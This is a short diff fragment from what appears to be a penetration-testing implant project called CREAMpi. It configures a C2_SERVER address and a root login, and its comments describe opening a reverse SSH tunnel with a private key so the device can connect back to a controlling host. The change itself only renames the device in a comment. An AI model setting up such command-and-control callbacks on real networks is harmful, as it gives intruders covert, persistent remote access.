offsecph/CREAMpi/README.md

 # i.e. ssh user@153.231.21.50 -i /root/.ssh/id_rsa and will use the tunnel port to create
 # a reverse ssh tunnel to connect back to this host.

-# The server which the keycroc will connect to
+# The server which the CREAMpi will connect to
 C2_SERVER="192.168.0.123"
 # Username that will be used to log in to the remote server
 USER="root"